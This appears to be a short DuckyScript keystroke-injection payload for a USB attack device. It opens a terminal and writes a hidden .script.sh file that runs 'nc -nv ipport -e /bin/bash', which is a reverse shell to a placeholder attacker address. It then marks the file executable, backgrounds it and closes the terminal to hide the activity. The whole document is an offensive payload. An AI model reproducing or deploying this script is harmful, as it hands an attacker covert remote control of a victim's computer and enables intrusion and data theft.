CTRL-ALT T
DELAY 400
ENTER
DELAY 300
STRING touch .script.sh
ENTER
STRING echo nc -nv ipport -e /bin/bash > .script.sh
ENTER
STRING chmod +x .script.sh
ENTER
STRING ./.script.sh ; bg
ENTER
DELAY 200
CTRL z
DELAY 400
STRING exit
ENTER

